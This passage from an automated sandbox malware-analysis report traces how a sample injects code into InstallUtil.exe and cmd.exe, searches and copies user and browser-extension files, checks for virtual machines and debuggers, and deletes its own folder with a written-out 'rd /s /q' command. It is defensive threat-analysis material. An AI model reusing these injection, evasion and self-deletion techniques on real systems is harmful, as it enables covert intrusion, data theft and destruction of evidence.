                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,4_2_00414CC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00409D1C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040D5C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040B5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00401D80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040BF4D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00415FD1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040B93F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00415B0B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0040CD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_00415142
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00410FBA GetSystemInfo,wsprintfA,4_2_00410FBA
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.000000000129B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002C96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002CCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWS
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2908281971.0000000002CCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.0000000001170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.0000000001170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeAPI call chain: ExitProcess graph end nodegraph_4-90973
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeAPI call chain: ExitProcess graph end nodegraph_4-90957
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeAPI call chain: ExitProcess graph end nodegraph_4-92288
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041D016
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418950
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_004014AD mov eax, dword ptr fs:[00000030h]4_2_004014AD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040148A mov eax, dword ptr fs:[00000030h]4_2_0040148A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_004014A2 mov eax, dword ptr fs:[00000030h]4_2_004014A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00418599 mov eax, dword ptr fs:[00000030h]4_2_00418599
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041859A mov eax, dword ptr fs:[00000030h]4_2_0041859A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,4_2_0040884C
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041D016
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0041D98C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0042762E SetUnhandledExceptionFilter,4_2_0042762E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C66B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C66B66C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C66B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C66B1F7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C81AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C81AC62
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: Process Memory Space: 7AeSqNv1rC.exe PID: 7300, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7648, type: MEMORYSTR
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Contains functionality to inject code into remote processes
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040F54A _memset,CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,4_2_0040F54A
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 400000 value starts with: 4D5AJump to behavior
                        Searches for specific processes (likely to inject)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_004124A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_0041257F
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 430000Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43D000Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 670000Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 671000Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: CB8008Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 400000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 401000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 45C000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 47B000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 47E000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 47F000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 2B1B008Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040111D cpuid 4_2_0040111D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_00410DDB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_0042B0CC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_0042B1C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_00429A50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_0042B268
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_0042B2C3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,4_2_0042AB40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,4_2_004253E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_0042B494
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,4_2_0042749C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: EnumSystemLocalesA,4_2_0042B556
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,4_2_00429D6E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,4_2_0042E56F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_00427576
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_00428DC4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_0042B5E7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_0042B580
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_0042B623
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: GetLocaleInfoA,4_2_0042E6A4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Users\user\Desktop\7AeSqNv1rC.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
